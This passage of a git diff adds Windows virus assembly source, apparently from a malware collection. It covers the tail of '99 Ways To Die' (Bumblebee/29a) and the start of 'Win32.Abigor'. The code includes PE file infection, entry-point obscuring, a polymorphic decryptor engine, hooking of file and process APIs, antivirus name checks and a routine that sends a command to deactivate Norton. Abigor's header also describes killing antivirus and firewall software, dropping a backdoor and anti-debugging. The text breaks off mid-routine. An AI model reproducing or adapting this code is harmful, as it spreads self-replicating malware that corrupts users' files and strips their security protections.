dword ptr [mapMem+ebp] + call dword ptr [_UnmapViewOfFile+ebp] + + push dword ptr [fhmap+ebp] + call dword ptr [_CloseHandle+ebp] + + xor eax,eax + push eax + push dword ptr [pad+ebp] + push eax + push 00000004h + push eax + push dword ptr [fHnd+ebp] + call dword ptr [_CreateFileMappingA+ebp] + or eax,eax + jz infectionErrorClose + + mov dword ptr [fhmap+ebp],eax + + xor eax,eax + push dword ptr [pad+ebp] + push eax + push eax + push 00000004h OR 00000002h + push dword ptr [fhmap+ebp] + call dword ptr [_MapViewOfFile+ebp] + or eax,eax + jz infectionErrorCloseMap + + mov dword ptr [mapMem+ebp],eax + + mov ecx,dword ptr [gensize+ebp] + mov esi,dword ptr [memHnd+ebp] + mov edi,eax + add edi,dword ptr [fileSize+ebp] + rep movsb + + xchg ecx,eax ; I want the padding + mov eax,edi ; to be zeroes... + sub eax,ecx + mov ecx,dword ptr [pad+ebp] + sub ecx,eax + xor eax,eax + rep stosb + + ; update the PE checksum + mov ecx,dword ptr [pad+ebp] + inc ecx + shr ecx,1 + mov esi,dword ptr [mapMem+ebp] + call CheckSumMappedFile ; calc partial check sum + add esi,dword ptr [esi+3ch] ; goto begin of nt header + mov word ptr [pchcks+ebp],ax + mov edx,1 ; complete the check sum + mov ecx,edx + mov ax,word ptr [esi+58h] + cmp word ptr [pchcks+ebp],ax + adc ecx,-1 + sub word ptr [pchcks+ebp],cx + sub word ptr [pchcks+ebp],ax + mov ax,word ptr [esi+5ah] + cmp word ptr [pchcks+ebp],ax + adc edx,-1 + sub word ptr [pchcks+ebp],dx + sub word ptr [pchcks+ebp],ax + movzx ecx,word ptr [pchcks+ebp] + add ecx,dword ptr [pad+ebp] + mov dword ptr [esi+58h],ecx ; set new check sum + + dec byte ptr [infCount+ebp] ; another infection + +infectionErrorCloseUnmap: + push dword ptr [mapMem+ebp] + call dword ptr [_UnmapViewOfFile+ebp] + +infectionErrorCloseMap: + push dword ptr [fhmap+ebp] + call dword ptr [_CloseHandle+ebp] + + lea edi,fileTime2+ebp + push edi + lea edi,fileTime1+ebp + push edi + lea edi,fileTime0+ebp + push edi + push dword ptr [fHnd+ebp] + call dword ptr [_SetFileTime+ebp] + +infectionErrorClose: + push dword ptr [fHnd+ebp] + call dword ptr [_CloseHandle+ebp] + +infectionErrorAttrib: + push dword ptr [fileAttrib+ebp] + push dword ptr [fNameAddr+ebp] + call dword ptr [_SetFileAttributesA+ebp] + +infectionError: + popad + ret +; +; Here the virus marks the file as no valid. This avoids later re-check +; the file in next executions of virus. Notice the infected files are not +; marked, for this issue i use size padding and test last section properties +; in second instance. Avers will find this mark in files that the virus +; doesn't want ;) +; +notValidFile: + mov edi,dword ptr [mapMem+ebp] + mov word ptr [edi+12h],'(:' ; checked but not valid! + jmp infectionErrorCloseUnmap + +; +; This my 'search EPO' routine. Searches for a call into the code section +; that points to: +; +; push ebp +; mov ebp,esp +; +; This is the way the high level languages get the arguments from a call +; of a procedure. If this code is found i assume the call found it's +; correct and i patch it to jump into the virus. +; +searchEPO: + pushad + mov edi,dword ptr [esi+28h] ; get host EP + + xor ecx,ecx + mov cx,word ptr [esi+06h] ; number of sections + mov esi,dword ptr [fstSec+ebp] ; get 1st section addr + +sectionLoop: ; look for code section + mov ebx,dword ptr [esi+0ch] + add ebx,dword ptr [esi+08h] ; test it's inside this + cmp edi,ebx ; section + jb sectionFound + add esi,28h + dec ecx + jnz sectionLoop + stc + jmp searchEPOOut + +sectionFound: + test dword ptr [esi+24h],10000000h ; avoid this kind of section + jnz searchEPOFail ; we can corrupt it! + + push esi + sub edi,dword ptr [esi+0ch] ; get raw address + add edi,dword ptr [esi+14h] + mov ecx,dword ptr [esi+10h] + cmp ecx,edi + jna searchEPOFail + sub ecx,edi + add edi,dword ptr [mapMem+ebp] + mov ebx,edi + add ebx,ecx + sub ebx,10h ; high secure fence +callLoop: ; loop that searches + cmp byte ptr [edi],0e8h ; for the call + jne continueCallLoop + mov edx,edi + add edx,dword ptr [edi+1] + add edx,5 + cmp ebx,edx + jb continueCallLoop + cmp edx,dword ptr [mapMem+ebp] + jb continueCallLoop + mov esi,edx + mov dx,word ptr [esi] + cmp dx,08b55h + jne continueCallLoop + mov dx,word ptr [esi+1] + cmp dx,0ec8bh + jne continueCallLoop + mov dword ptr [EPOAddr+ebp],edi + sub edi,dword ptr [mapMem+ebp] + pop esi + add edi,dword ptr [esi+0ch] ; get rva address + sub edi,dword ptr [esi+14h] + mov dword ptr [EPORva+ebp],edi + clc + jmp searchEPOOut +continueCallLoop: + inc edi + loop callLoop +searchEPOFail: + pop esi + stc +searchEPOOut: + popad + ret +; +; Updates the virus sample ready to infect in our memory buffer. +; +updateVSample: + lea edx,dateTime+ebp + push edx + call dword ptr [_GetSystemTime+ebp] + + lea esi,dateTime+ebp ; save month-1 + xor eax,eax + mov ax,word ptr [esi+2] + dec eax + or eax,eax + jnz storeCountdown + + add eax,12 + +storeCountdown: + mov word ptr [countdown+ebp],ax + + lea esi,vBegin+ebp ; update integrity check + mov edi,vSize-4 ; using CRC32 + call CRC32 + mov dword ptr [myCRC32+ebp],eax + + xor dword ptr [hostRET+ebp],eax ; hide hostEP + + lea esi,vBegin+ebp ; copy virus body + mov edi,dword ptr [memHnd+ebp] + mov ecx,vSize + rep movsb + + mov ecx,dword ptr [CodeSize+ebp] ; encrypt virus body + mov esi,5 + add esi,dword ptr [memHnd+ebp] + mov eax,dword ptr [CrptKey+ebp] +encrptLoop: + xor dword ptr [esi],eax + + test byte ptr [CrptFlags+ebp],F_SADD ; slide add? + jz crptNoSADD + + mov edx,dword ptr [CrptKey+ebp] + not edx + add eax,edx +crptNoSADD: + test byte ptr [CrptFlags+ebp],F_SSUB ; slide sub? + jz crptNoSSUB + + mov edx,dword ptr [CrptKey+ebp] + rol edx,4 + sub eax,edx +crptNoSSUB: + add esi,4 + loop encrptLoop + ret +; +; [99WATLEN] 99 WAys To Lame ENgine +; +; This is the lame poly engine of this time :( +; It's only a way to not put fixed decryptors... +; Notice it doesn't add garbage instructions. +; +; EAX: CrptKey +; ECX: CodeSize +; EDI: Destination address +; +; returns EAX: size of generated proc +; +; : eax edx ebx ecx esi edi +; : eax edx ebx ecx esi edi - { } +; <*Imm32>: Random immediate value +; ?? op ??: Op could be here (or not ;) +; +; push ebp +; mov ebp,esp +; push +; push +; mov , +; mov , +; mov ebp,[ebp+4] +;theloop: +; xor [ebp], +; ?? add , ?? +; ?? sub , ?? +; add ebp,4 +; sub ,1 +; jne theloop +; pop +; pop +; pop ebp +; ret +; +GenDCrpt: + pushad ; setup regs status + xor eax,eax + lea edi,RegStatus+ebp + mov ecx,9 + rep stosb + popad + mov byte ptr [RegStatus+ebp+_EBP],1 + mov byte ptr [RegStatus+ebp+_ESP],1 + mov dword ptr [CrptKey+ebp],eax + mov dword ptr [CodeSize+ebp],ecx + mov byte ptr [CrptFlags+ebp],al + xor byte ptr [CrptFlags+ebp],ah + + xor eax,eax + push edi + + mov cl,_EBP + call AddPushREG + + mov ax,0ec8bh + stosw + + call GetReg + mov byte ptr [KeyReg+ebp],al + + mov cl,al + call AddPushREG + + call GetReg + mov byte ptr [LoopReg+ebp],al + + mov cl,al + call AddPushREG + + mov cl,byte ptr [KeyReg+ebp] + mov edx,dword ptr [CrptKey+ebp] + call AddMovREGINM + + mov cl,byte ptr [LoopReg+ebp] + mov edx,dword ptr [CodeSize+ebp] + call AddMovREGINM + + mov edx,04h + mov cl,_EBP + call AddMovREGMEMEBP + + push edi + + mov cl,byte ptr [KeyReg+ebp] + call AddXorMEMEBPREG + + test byte ptr [CrptFlags+ebp],F_SADD + jz noSADD + + mov cl,byte ptr [KeyReg+ebp] + mov edx,dword ptr [CrptKey+ebp] + not edx + call AddAddREGINM + +noSADD: + test byte ptr [CrptFlags+ebp],F_SSUB + jz noSSUB + + mov cl,byte ptr [KeyReg+ebp] + mov edx,dword ptr [CrptKey+ebp] + rol edx,4 + call AddSubREGINM + +noSSUB: + mov cl,_EBP + mov edx,04h + call AddAddREGINM + + mov cl,byte ptr [LoopReg+ebp] + mov edx,1 + call AddSubREGINM + + pop ebx + mov eax,edi + sub eax,ebx + push eax + mov al,75h + stosb + pop eax + mov ah,0feh + xchg al,ah + sub al,ah + stosb + + mov cl,byte ptr [LoopReg+ebp] + call AddPopREG + + mov al,byte ptr [LoopReg+ebp] + call FreeReg + + mov cl,byte ptr [KeyReg+ebp] + call AddPopREG + + mov cl,_EBP + call AddPopREG + + mov al,0c3h + stosb + + pop esi + sub edi,esi + mov eax,edi + ret + +; +; Poly engine data +; +_EAX equ 0 +_ECX equ 1 +_EDX equ 2 +_EBX equ 3 +_ESP equ 4 +_EBP equ 5 +_ESI equ 6 +_EDI equ 7 +F_SADD equ 1 or 4 +F_SSUB equ 2 or 4 +RegStatus db 8 dup(0) +CrptFlags db 0 +KeyReg db 0 +LoopReg db 0 +CrptKey dd 0 +CodeSize dd 0 + +; +; returns AL: selected register +; +GetReg: + xor eax,eax + mov al,byte ptr [CrptKey+ebp] +GetReg1: + and al,7 + lea ecx,RegStatus+ebp + add ecx,eax + mov dl,byte ptr [ecx] + or dl,dl + jz GetReg0 + inc al + jmp GetReg1 +GetReg0: + mov byte ptr [ecx],1 + ret + +; +; AL: selected register to free +; +FreeReg: + and eax,7 + lea ecx,RegStatus+ebp + add ecx,eax + mov byte ptr [ecx],0 + ret + +; +; Instruction generators +; +; EDI: Destination code +; ECX: Reg (if applicable) +; EDX: Inm (if applicable) +; + +AddPushREG: + mov al,050h + add al,cl + stosb + ret + +AddPopREG: + mov al,058h + add al,cl + stosb + ret + +AddMovREGINM: + mov al,0b8h + add al,cl + stosb + mov eax,edx + stosd + ret + +AddMovREGMEMEBP: + mov al,08bh + stosb + mov al,08h + mul cl + add al,85h + stosb + mov eax,edx + stosd + ret + +AddXorMEMEBPREG: + mov al,031h + stosb + mov al,08h + mul cl + add al,45h + stosb + xor al,al + stosb + ret + +AddAddREGINM: + or cl,cl + jnz AddAddREGINM0 + mov al,05h + stosb + jmp AddAddREGINM1 +AddAddREGINM0: + mov al,081h + stosb + mov al,0c0h + add al,cl + stosb +AddAddREGINM1: + mov eax,edx + stosd + ret + +AddSubREGINM: + or cl,cl + jnz AddSubREGINM0 + mov al,2dh + stosb + jmp AddSubREGINM1 +AddSubREGINM0: + mov al,081h + stosb + mov al,0e8h + add al,cl + stosb +AddSubREGINM1: + mov eax,edx + stosd + ret +; +; This is our func that does the partial check sum of the file. I know it +; must be improved... but i'm so lazy :( (still lazy) +; +; in: ecx (fileSize+1) shr 2 +; esi offset mappedFile +; +; out: eax partial checksum of file +; +CheckSumMappedFile: + push esi + xor eax, eax + shl ecx, 1 + je func0_saltito0 + test esi, 00000002h + je func0_saltito1 + sub edx, edx + mov dx, word ptr [esi] + add eax, edx + adc eax, 00000000h + add esi, 00000002h + sub ecx, 00000002h + +func0_saltito1: + mov edx, ecx + and edx, 00000007h + sub ecx, edx + je func0_saltito2 + test ecx, 00000008h + je func0_saltito3 + add eax, dword ptr [esi] + adc eax, dword ptr [esi+04h] + adc eax, 00000000h + add esi, 00000008h + sub ecx, 00000008h + je func0_saltito2 + +func0_saltito3: + test ecx, 00000010h + je func0_saltito4 + add eax, dword ptr [esi] + adc eax, dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, 00000000h + add esi, 00000010h + sub ecx, 00000010h + je func0_saltito2 + +func0_saltito4: + test ecx, 00000020h + je func0_saltito5 + add eax, dword ptr [esi] + + adc eax, dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, dword ptr [esi+10h] + adc eax, dword ptr [esi+14h] + adc eax, dword ptr [esi+18h] + adc eax, dword ptr [esi+1Ch] + adc eax, 00000000h + add esi, 00000020h + sub ecx, 00000020h + je func0_saltito2 + +func0_saltito5: + test ecx, 00000040h + je func0_saltito6 + add eax, dword ptr [esi] + + adc eax, dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, dword ptr [esi+10h] + adc eax, dword ptr [esi+14h] + adc eax, dword ptr [esi+18h] + adc eax, dword ptr [esi+1Ch] + adc eax, dword ptr [esi+20h] + adc eax, dword ptr [esi+24h] + adc eax, dword ptr [esi+28h] + adc eax, dword ptr [esi+2Ch] + adc eax, dword ptr [esi+30h] + adc eax, dword ptr [esi+34h] + adc eax, dword ptr [esi+38h] + adc eax, dword ptr [esi+3Ch] + adc eax, 00000000h + add esi, 00000040h + sub ecx, 00000040h + je func0_saltito2 + +func0_saltito6: + add eax, dword ptr [esi] + + adc eax, dword ptr [esi+04h] + adc eax, dword ptr [esi+08h] + adc eax, dword ptr [esi+0Ch] + adc eax, dword ptr [esi+10h] + adc eax, dword ptr [esi+14h] + adc eax, dword ptr [esi+18h] + adc eax, dword ptr [esi+1Ch] + adc eax, dword ptr [esi+20h] + adc eax, dword ptr [esi+24h] + adc eax, dword ptr [esi+28h] + adc eax, dword ptr [esi+2Ch] + adc eax, dword ptr [esi+30h] + adc eax, dword ptr [esi+34h] + adc eax, dword ptr [esi+38h] + adc eax, dword ptr [esi+3Ch] + adc eax, dword ptr [esi+40h] + adc eax, dword ptr [esi+44h] + adc eax, dword ptr [esi+48h] + adc eax, dword ptr [esi+4Ch] + adc eax, dword ptr [esi+50h] + adc eax, dword ptr [esi+54h] + adc eax, dword ptr [esi+58h] + adc eax, dword ptr [esi+5Ch] + adc eax, dword ptr [esi+60h] + adc eax, dword ptr [esi+64h] + adc eax, dword ptr [esi+68h] + adc eax, dword ptr [esi+6Ch] + adc eax, dword ptr [esi+70h] + adc eax, dword ptr [esi+74h] + adc eax, dword ptr [esi+78h] + adc eax, dword ptr [esi+7Ch] + adc eax, 00000000h + add esi, 00000080h + sub ecx, 00000080h + jne func0_saltito6 + +func0_saltito2: + test edx, edx + je func0_saltito0 + +func0_saltito7: + sub ecx, ecx + mov cx, word ptr [esi] + add eax, ecx + adc eax, 00000000h + add esi, 00000002h + sub edx, 00000002h + jne func0_saltito7 + +func0_saltito0: + mov edx, eax + shr edx, 10h + and eax, 0000FFFFh + add eax, edx + mov edx, eax + shr edx, 10h + add eax, edx + and eax, 0000FFFFh + pop esi + ret +; +; Virus data --------------------------------------------------------------- +; +HOOKTABLEBEGIN label byte + dd offset _CreateFileA + dd offset Hook0 + dd offset _MoveFileA + dd offset Hook1 + dd offset _CopyFileA + dd offset Hook2 + dd offset _CreateProcessA + dd offset Hook3 + dd offset _SetFileAttributesA + dd offset Hook4 + dd offset _GetFileAttributesA + dd offset Hook5 + dd offset _SearchPathA + dd offset Hook6 + dd offset _SetCurrentDirectoryA + dd offset Hook7 +HOOKTABLEEND label byte + +FSTAPI label byte +CrcCreateFileA dd 08c892ddfh + db 12 +_CreateFileA dd 0 + +CrcMapViewOfFile dd 0797b49ech + db 14 +_MapViewOfFile dd 0 + +CrcCreatFileMappingA dd 096b2d96ch + db 19 +_CreateFileMappingA dd 0 + +CrcUnmapViewOfFile dd 094524b42h + db 16 +_UnmapViewOfFile dd 0 + +CrcCloseHandle dd 068624a9dh + db 12 +_CloseHandle dd 0 + +CrcFindFirstFileA dd 0ae17ebefh + db 15 +_FindFirstFileA dd 0 + +CrcFindNextFileA dd 0aa700106h + db 14 +_FindNextFileA dd 0 + +CrcFindClose dd 0c200be21h + db 10 +_FindClose dd 0 + +CrcVirtualAlloc dd 04402890eh + db 13 +_VirtualAlloc dd 0 + +CrcGetTickCount dd 0613fd7bah + db 13 +_GetTickCount dd 0 + +CrcGetFileTime dd 04434e8feh + db 12 +_GetFileTime dd 0 + +CrcSetFileTime dd 04b2a3e7dh + db 12 +_SetFileTime dd 0 + +CrcSetFileAttributesA dd 03c19e536h + db 19 +_SetFileAttributesA dd 0 + +CrcGetFileAttributesA dd 0c633d3deh + db 19 +_GetFileAttributesA dd 0 + +CrcGetFileSize dd 0ef7d811bh + db 12 +_GetFileSize dd 0 + +CrcGetSystemTime dd 075b7ebe8h + db 14 +_GetSystemTime dd 0 + +CrcMoveFileA dd 02308923fh + db 10 +_MoveFileA dd 0 + +CrcCopyFileA dd 05bd05db1h + db 10 +_CopyFileA dd 0 + +CrcCreateProcessA dd 0267e0b05h + db 15 +_CreateProcessA dd 0 + +CrcSearchPathA dd 0f4d9d033h + db 12 +_SearchPathA dd 0 + +CrcGetCurrentDirectoryA dd 0ebc6c18bh + db 21 +_GetCurrentDirectoryA dd 0 + +CrcSetCurrentDirectoryA dd 0b2dbd7dch + db 21 +_SetCurrentDirectoryA dd 0 + +CrcGetWindowsDirectoryA dd 0fe248274h + db 21 +_GetWindowsDirectoryA dd 0 +ENDAPI label byte +; AV: AVP, PAV, NAV, ... +; AN: SCAN, VISUSSCAN, ... +; DR: DRWEB +; ID: SPIDER +; OD: NOD-ICE +; TB: THUNDERBYTE... (this still exists?) +; F-: F-PROT, ... +avStrings dw 'VA','NA','RD','DI','DO','BT','-F' +vStringsCout equ (offset $-offset avStrings)/2 +fndMask db '*.*',0 + +copyright db '< 99 Ways To Die Coded by Bumblebee/29a >' + +; Following value cannot be included in self check CRC32... +myCRC32 dd 0 +vEnd label byte +; +; virus ENDS HERE +; +crypt: +; +; Temp data. Not stored into the file, only 1st generation. +; +BUFFERBEGIN label byte +stringBuffer: ret + db STRINGTOP-1 dup(0) +tmpPath db STRINGTOP dup(0) +currentPath db STRINGTOP dup(0) +address dd 0 +names dd 0 +ordinals dd 0 +nexports dd 0 +expcount dd 0 +memHnd dd 0 + +fHnd dd 0 +fhmap dd 0 +mapMem dd 0 +infCount db 0 + +fileSize dd 0 +fileAttrib dd 0 +fileTime0 dd 0,0 +fileTime1 dd 0,0 +fileTime2 dd 0,0 +pad dd 0 +fNameAddr dd 0 +gensize dd 0 +myRVA dd 0 +fstSec dd 0 +find_data WIN32_FIND_DATA <0> +findHnd dd 0 +semHook db 0 +EPORva dd 0 +EPOAddr dd 0 +dateTime db 16 dup(0) +payload db 0 +pchcks dw 0 +BUFFEREND label byte +BUFFERSIZE equ BUFFEREND-BUFFERBEGIN + +; +; Fake host for 1st generation +; +fakeHost: + push 1000h +title: @strz "(C) 2000 Bumblebee/29a" +mess: @strz "99 Ways To Die activated. Have a nice day." + push 0h + call MessageBoxA + + push 0h + call ExitProcess + +Ends +End inicio +; +; hi sweet! +; +; ' the preacher said, richer or poorer +; my mama said, thick or thin +; you can kiss me, baby +; when it's time to get thick again ' +; +; + diff --git a/Win32/Win32.Abigor.ASM b/Win32/Win32.Abigor.ASM new file mode 100644 index 00000000..1f539607 --- /dev/null +++ b/Win32/Win32.Abigor.ASM @@ -0,0 +1,8857 @@ +; ******************** +; * Win32.Abigor * +; ******************** +; +; It is a polymorphic PE file appending win32 virus that uses EPO. +; It is also my first virus attempt. +; +; here is some of it's feature : +; +;* Infect filez on execution (via registry hooking), and directly the system and windows folder +; (1st execution only) +;* Patch all occurence of ExitProcess, exit and _exit so the virus runs when the hosts terminates +; +;* After some time, it will disable AVz and firewall by patching their entry point with a "ret", +; deleting their service. Then it drops it's backdoor component. +; +;* Randomly trashes the system by blocking exe'z execution, this has 1/1000 chances to happen +; when an exe is executed and it is during "generaly" until the system reboots. +; . +; . +; . +; (well it's not a feature, it's a bug ! :D) +; +; +; +; +; +; +; +; +; Well... no more talking here's the code -> + + .586 + .model flat, stdcall + option casemap :none ; case sensitive + + + include \masm32\include\windows.inc + include \masm32\include\kernel32.inc + includelib \masm32\lib\kernel32.lib + +__DBG_ON__ equ FALSE ; TRUE : disable anti-debugging feature FALSE : enable anti-debugging feature +__RELEASE_MODE__ equ TRUE ; FALSE : does not infect windows and system TRUE : does infect win & sys dir + +%out +%out Virus Version INFO: +%out +IF __DBG_ON__ + + %out * Anti-debugging feature DISABLED + +ELSE + %out * Anti-debugging feature ENABLED + +ENDIF + +IF __RELEASE_MODE__ + + %out * DOES infect windows & system directory on 1st execution + %out * Anti-AV routines ENABLED +ELSE + + %out * DOES NOT infect windows & system directory on 1st execution + %out * Anti-AV routines DISABLED + +ENDIF + +%out + +.data + + +templ db "%lx",0 ; DEBUG 1st gen + +db 0 + + +.data? +buf db 256 dup (?) ; DEBUG 1st gen + +.code + + ALIGN 4 + start: + xor ebx , ebx +jmp VirusStart +hehe:invokE ExitProcess,0 ; 1st gen. +VirusStart: + + + + + rept 8 + nop + ENDM + cld + + + Call ___Delta + ___Delta: + pop ebp + sub ebp, OFFSET ___Delta + + + + + and dword ptr [ebp + Patched?],0 ; init error + +assume fs:nothing + + mov dword ptr [ebp + @@Delta],ebp ; Delta to restore if General error + mov dword ptr [ebp + @@@Delta],ebp ; Delta to restore if Kernel base access error + + + lea eax,[exception_handler+ebp] + push eax + + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + + + + + mov esi, dword ptr [ebp + _KERNEL32] ; try with last used kernel + Call GetK32 + or eax,eax + jnz @F + + mov esi,0BFF70000h ; Win9x + Call GetK32 ; ... + or eax,eax + jnz @F + mov esi,077E40000h ; XP + Call GetK32 ; GetKernel + or eax,eax + jnz @F + + mov esi,077E00000h ; NT/W2k + Call GetK32 + or eax,eax + jnz @F + mov esi,077E80000h ; NT/W2k + Call GetK32 + or eax,eax + jnz @F + mov esi,077ED0000h ; NT/W2k + Call GetK32 + or eax,eax + jnz @F + mov esi,077F00000h ; NT/W2k + Call GetK32 + + + @@: + + mov dword ptr [ebp+_KERNEL32],eax ; Save kernel base + + Call GetGetProcAddressAddress ; hum... + + IFE __DBG_ON__ ; enable debugging for test only + + mov eax, dword ptr [ebp + _GetProcAddress] + cmp byte ptr [eax], 0CCh + jz ZeroShit + + lea eax, dword ptr [ebp + szIsDebuggerPresent] + push eax + push dword ptr [ebp+_KERNEL32] + Call dword ptr [ebp + _GetProcAddress] + + + .IF eax == 0 ; -> win95 + mov ecx,fs:[20h] + jecxz @F + jmp ZeroShit ; quit if debugger found + @@: + .ELSE ; -> win98, NT, 2k, XP + CAll EAX + or eax, eax + jz @F + jmp ZeroShit ; quit if debugger found + @@: + .ENDIF + + ENDIF + + push 3 + lea eax, dword ptr [ebp + szSetErrorMode] + Call K32Api + + lea eax,[EnableHostExecutionOnError_handlder+ebp] ; Setup SEH frame for poly error handling + push eax + mov dword ptr [ebp + EnableHostExecutionOnError_Delta],ebp ; Save Delta + mov dword ptr [ebp + EnableHostExecutionOnError_Stack],esp ; Save Stack + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + sub esp, SIZEOF OSVERSIONINFO + mov ebx, esp + assume ebx : ptr OSVERSIONINFO + mov dword ptr [ebx].dwOSVersionInfoSize, SIZEOF OSVERSIONINFO + push ebx + lea eax, dword ptr [ebp + szGetVersionExA] + Call K32Api + push dword ptr [ebx].dwPlatformId + pop dword ptr [ebp + WinVer] + add esp, SIZEOF OSVERSIONINFO + + assume ebx : NOTHING + + lea eax, dword ptr [ebp + Advapi32] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + mov dword ptr [ebp + _ADVAPI32], eax + + lea eax, dword ptr [ebp + Psapi] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + mov dword ptr [ebp + _PSAPI], eax + + lea eax, dword ptr [ebp + SFC] + push eax + lea eax, dword ptr [ebp + szLoadLibraryA] + Call K32Api + mov dword ptr [ebp + hSFC], eax + + lea eax,dword ptr [ebp + USER32] + push eax + lea eax,dword ptr [ebp+szLoadLibraryA] + Call K32Api + mov dword ptr [ebp+_USER32],eax ; Save user32 base + + lea eax,dword ptr [ebp + Shell32] + push eax + lea eax,dword ptr [ebp+szLoadLibraryA] + Call K32Api + mov dword ptr [ebp+_Shell32],eax ; Save user32 base + + + + + Call Random_init ; init rng seeds + + + ;CALL SetupRegHook ; install virus + + IF __RELEASE_MODE__ + + sub esp, 120 + mov ebx, esp + mov dword ptr [ebp + CompNameSize], 100 + lea eax, dword ptr [ebp + CompNameSize] + push eax + push ebx + ;lea eax, dword ptr [ebp + szGetComputerNameA] ; ERR_NOACCESS ??? + ;Call K32Api + lea eax, dword ptr [ebp + szGetUserNameA] + Call ADVAPI32Api + lea edi, dword ptr [ebp + OldCompName] + mov esi, ebx + mov eax, ebx + call _strlen + mov ecx, eax + mov edx, ecx + repz cmpsb + and byte ptr [ebp + NewSystem],0 + test ecx, ecx + jz CmpInfTime ; not a new system: abort massive infection + + ;####################### executed ONLY once on 1st infection ##################### + + mov esi, ebx + lea edi, dword ptr [ebp + OldCompName] ; store old computer name for further checking + xchg ecx, edx + rep movsb + + + lea eax, dword ptr [ebp + InfectionTime] ; retrieve 1st infection time on this computer + push eax + lea eax, dword ptr [ebp + szGetSystemTimeAsFileTime] + Call K32Api + + lea eax,[win_infect_handlder+ebp] ; Setup SEH frame for poly error handling + push eax + mov dword ptr [ebp + win_infectDelta],ebp ; Save Delta + mov dword ptr [ebp + win_infectStack],esp ; Save Stack + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + + inc byte ptr [ebp + NewSystem] + + xor esi, esi + lea eax, dword ptr [ebp + NAV_Win] + push eax + push esi + lea eax, dword ptr [ebp + szFindWindowA] + Call U32Api + mov dword ptr [ebp + hNAVWnd], eax + or eax, eax + jz @F + + push esi + push 9c42h ; Desactivate NAV + push WM_COMMAND + push eax + lea eax, dword ptr [ebp + szSendMessageA] + Call U32Api + @@: + + + Call infect_newsystem ; ensure perenniality on new system & sleep for some day + + + mov ecx, dword ptr [ebp + hNAVWnd] + jecxz @F + + push 0 + push 9c42h ; Restore NAV + push WM_COMMAND + push ecx + lea eax, dword ptr [ebp + szSendMessageA] + Call U32Api + @@: + + + win_infect_handlder: + DB 0BCh + win_infectStack dd 00000000h ; Restore Stack + + xor edx,edx + pop dword ptr fs:[edx] + + + db 0BDh + win_infectDelta dd 00000000h ; Restore Delta + + + ;################################################################################# + CmpInfTime: + add esp, 120 + + cmp byte ptr [ebp + NewSystem],0 + jnz no_drop + + lea eax, dword ptr [ebp + CreationTime] ; retrieve current time + push eax + lea eax, dword ptr [ebp + szGetSystemTimeAsFileTime] + Call K32Api + + mov eax, dword ptr [ebp + InfectionTime].dwLowDateTime + sub eax, dword ptr [ebp + CreationTime].dwLowDateTime ; substract current time + ;mov dword ptr [ebp + TimeDifference].dwLowDateTime, eax + + + mov eax, dword ptr [ebp + InfectionTime].dwHighDateTime + sbb eax, dword ptr [ebp + CreationTime].dwHighDateTime ; substract current time + mov dword ptr [ebp + TimeDifference].dwHighDateTime, eax + + cmp eax, TIME_DROP + ja no_drop + + + + + CAll KillAVz ; après que TIME_DROP soit dépassé detruire les AVs + + lea eax, dword ptr [ebp + TS_Win] + push eax + push eax + lea eax, dword ptr [ebp + szFindWindowA] + Call U32Api + or eax, eax + jnz no_drop ; Backdoor déjà implanté sur notre système ? + + + Call Drop_BackDoor ; non ??? implantons !! + + no_drop: + ENDIF + + + + + EnableHostExecutionOnError_handlder: + DB 0BCh + EnableHostExecutionOnError_Stack dd 00000000h ; Restore Stack + + xor edx,edx + pop dword ptr fs:[edx] + + db 0BDh + EnableHostExecutionOnError_Delta dd 00000000h ; Restore Delta + + + CALL SetupRegHook ; install virus + lea eax, dword ptr [ebp + szGetCommandLineA] + Call K32Api + + or byte ptr [eax],20h + cmp byte ptr [eax],41h + 32 + jb Return2host + cmp byte ptr [eax],5Ah + 32 + ja Return2host + + + + sub esp, 600 + + + mov edi, eax + + Call _strlen + mov ecx, eax + + mov al,'"' + repnz scasb + + + mov dword ptr [ebp + pFileName], edi + + mov al,'"' + repnz scasb + + + .IF byte ptr [edi] == ' ' ; in case of cmdline... + + and byte ptr [edi-1],0 + mov eax, dword ptr [ebp + pFileName] + Call _strlen + mov ecx, eax + mov al,' ' + repnz scasb + and byte ptr [edi-1],0 + + .ELSE + and dword ptr [edi-1],0 + .ENDIF + + ;push edi + + sub esp, 380 + mov esi, esp + + + push esi + mov byte ptr [esi],' ' + + inc esi + + + @@: + mov al, byte ptr [edi] + mov byte ptr [esi], al + inc edi + inc esi + or al,al + jz @F + jmp @B + @@: + + pop esi + + + mov eax, dword ptr [ebp + pFileName] + + IF __RELEASE_MODE__ + + pushad + + + cmp byte ptr [ebp + NewSystem],0 + jnz SkipKill + xor edx, edx ; process is not active + mov eax, dword ptr [ebp + pFileName] + cmp dword ptr [ebp + TimeDifference].dwHighDateTime, TIME_DROP ; Time to engage kill routines ? + ja SkipKill + ;pushad + ;push 0 + ;push eax + ;push eax + ;push 0 + ;lea eax, [ebp + szMessageBoxA] + ;call U32Api + ;popad + Call KillAV ; Check if the file we are trying to run is an AV & if so kill it... + SkipKill: + popad + + ENDIF + + pushad + Call IsFileAV? + dec eax + popad + jz @F ; IS it an AV file ? + Call infect ; infect !!! + @@: + + sub esp, (SIZEOF STARTUPINFO + 30) + mov ebx, esp + pushad + mov edi, ebx + mov ecx, (SIZEOF STARTUPINFO + 30) + xor al, al + rep stosb + popad + push ebx + lea eax, dword ptr [ebp + szGetStartupInfoA] + Call K32Api + + ;--- + sub esp, 280 + mov ecx, esp + + push ecx ; for lstricmp + + push 0FFh + push ecx + push 0 + lea eax, dword ptr [ebp + szGetModuleFileNameA] + Call K32Api + + + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szlstrcmpiA] + Call K32Api + sub esp, -280 + + sub esp, (SIZEOF PROCESS_INFORMATION + 30) + mov edx, esp + pushad + mov edi, edx + mov ecx, (SIZEOF PROCESS_INFORMATION + 30) + xor al, al + rep stosb + popad + or eax, eax + jz skpexec + + + + sub esp, 280 + mov edi, esp + push esi + mov esi, dword ptr [ebp + pFileName] + mov eax, esi + call _strlen + mov ecx, eax + 